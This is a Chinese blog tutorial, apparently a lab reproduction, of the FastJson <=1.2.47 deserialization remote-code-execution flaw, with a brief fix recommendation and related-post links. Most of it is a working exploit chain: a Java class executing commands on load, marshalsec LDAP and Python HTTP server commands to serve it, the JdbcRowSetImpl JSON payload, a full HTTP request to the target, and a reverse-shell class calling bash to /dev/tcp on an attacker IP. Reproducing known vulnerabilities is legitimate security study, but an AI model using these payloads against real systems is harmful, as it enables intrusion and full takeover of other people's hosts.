2. 程式人生 > 實用技巧 >FastJson<=1.2.47漏洞復現

FastJson<=1.2.47漏洞復現

阿新 發佈:2020-07-31

關於FastJson<=1.2.47漏洞復現

參考博文:

https://www.cnblogs.com/sijidou/p/13121332.html

https://blog.csdn.net/qq_40989258/article/details/103049474

0x01 概述

  1. Nmap掃描Web IP地址,可以得出8090埠是業務埠

2. 通過DNSLOG服務可以探測業務是否存在fastjson業務:http://www.adminxe.com/1037.html

此處我只直接可以看到pom.xml的引用,DNSLOG方法mark下後續研究

0x02 環境搭建

  1. 本地先構造POC,新建TouchFile.Java,並進行編譯
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

本地用Python啟動一個HTTP服務,並把TouchFile放在啟動目錄

python2 -m SimpleHTTPServer 1111

python3 無SimpleHTTPServe模組

也可啟動tomcat容器,將TouchFile放至業務啟動目錄即可

2. 啟動LDAP服務。

是藉助https://github.com/mbechler/marshalsec服務開啟ladp服務,監聽9999埠,並指定載入遠端類TouchFile.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "

http://ip:1111/#TouchFile" 9999

0x03 漏洞利用

編寫Playload

{
   "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
     "dataSourceName":"ldap://IP:9999/TouchFile",
        "autoCommit":true

    }
}

報文如下:

執行後可以看到LDAP和Python有報文返回。

登入到容器內部,可以看到 檔案已經建立成功,實現RCE目的,執行任意命令

同理可以通過反彈shell直接拿到主機 (通過linux通訊)

構造playload

import java.lang.Runtime;

import java.lang.Process;

public class Shell{

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/IP/7777 0>&1"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}}}

報文如下:

POST  / HTTP/1.1
Host: 目標IP:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 290

{

    "name":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "x":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://靶機IP:9999/Shell",

        "autoCommit":true

    }

 

}

Shell回顯直接拿到目標主機容器root許可權

修復意見:升級fastjson為1.2.70版本

相關推薦

FastJson&lt;=1.2.47漏洞復現

關於FastJson&lt;=1.2.47漏洞復現 參考博文: https://www.cnblogs.com/sijidou/p/13121332.html https://blog.csdn.net/qq_40989258/article/details/103049474

Fastjson &lt;= 1.2.47 反序列化漏洞復現

0x01 前言 Fastjson 是一個 Java 語言編寫的高效能功能完善的 JSON 庫,可以將 Java 物件轉換為 JSON 格式,也可以將 JSON 字串轉換為 Java 物件,在中國和美國使用較為廣泛。

fastjson 1.2.24/1.2.47 rce復現

一、環境搭建 實驗共用了兩臺 vps 第一臺 vpsA 搭建 fastjson 環境 apt-get install docker.io

Java安全之反序列化(四)--fastjson &lt; 1.2.41-1.2.45

  fastjson1.2.24漏洞之後,官方的修復方案是引入checkAutotype安全機制,通過黑白名單來實現防禦,並且在預設情況下也不支援@type來指定隨意物件進行例項化了。下圖是1.2.25版本。

漏洞復現】Shiro&lt;=1.2.4反序列化漏洞

0x01 概述 Shiro簡介 Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。使用Shiro的易於理解的API,您可以快速、輕鬆地獲得任何應用程式,從最小的移動應用程式到最大的網路和企業

Maven Failure to find com.alibaba:fastjson:pom:1.2.49

Failure to find com.alibaba:fastjson:pom:1.2.49 in https://pkgs.abc.com/maven was cached in the local repository, resolution will not be reattempted until the update interval of central has elapsed o

在scala中使用fastjson將json字串轉為scala中的Class物件時出錯 com.alibaba.fastjson.JSONException: syntax error, expect {, actual float, pos 178, fieldName order_price, fastjson-version 1.2.68

com.alibaba.fastjson.JSONException: syntax error, expect {, actual float, pos 178, fieldName order_price, fastjson-version 1.2.68

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) 復現

前言 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)復現

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)復現 環境搭建 docker pull medicean/vulapps:s_shiro_1

Fastjson 1.2.22-24 反序列化漏洞分析(2

Fastjson 1.2.22-24 反序列化漏洞分析(21.環境搭建 我們以ubuntu作為被攻擊的伺服器,本機電腦作為攻擊者

Fastjson 1.2.24 反序列化漏洞研究

一、概述   fastjson自2017年爆出序列化漏洞以來,漏洞就一直停不下來。本次主要研究2017年第一次爆出反序列化漏洞

漏洞復現 - Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

漏洞原理 Apache Shiro 是 Java 的一個安全框架,可以幫助我們完成:認證、授權、加密、會話管理、與 Web 整合、快取等功能,應用十分廣泛。

【高危安全通告】fastjson1.2.80反序列化漏洞

近日Fastjson Develop Team釋出安全公告,Fastjson1.2.80版本中存在反序列化漏洞。攻擊者可繞過預設autoType關閉限制,攻擊遠端伺服器,風險影響較大。

【JNPF修改通告】fastjson1.2.80反序列化漏洞

近日Fastjson Develop Team 發現 fastjson 1.2.80及以下存在新的風險,存在反序列化漏洞。攻擊者可繞過預設autoType關閉限制,攻擊遠端伺服器,風險影響較大,請大家關注。

解決fastjson1.1.41升級到1.2.28後報錯問題詳解

最近因為fastjson安全漏洞,升級jar包時,踩了一些坑。 新版本FastJsonHttpMessageConverter初始化,預設設定MediaType為*/*

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

fastjson漏洞復現

漏洞產生原因 fastjson提供了autotype功能,在請求過程中,我們可以在請求包中通過修改@type的值,來反序列化為指定的型別,而fastjson在反序列化過程中會設定和獲取類中的屬性,如果類中存在惡意方法,就會導致程式

漏洞復現-fastjson1.2.24-RCE

0x00 實驗環境 攻擊機:Win 10、Win Server2012 R2(公網環境,惡意java檔案所在伺服器)

漏洞除錯】fastjson1.2.24反序列化漏洞復現-mac版

1 漏洞原理 Fastjson支援在json資料中使用@type屬性指定該json資料被反序列為什麼型別的物件。說明在反序列化物件時,會執行javabean的setter方法為其屬性賦值。

fastjson遠端命令執行漏洞復現

fastjson遠端命令執行漏洞復現 使用vulhub提供的docker環境:https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce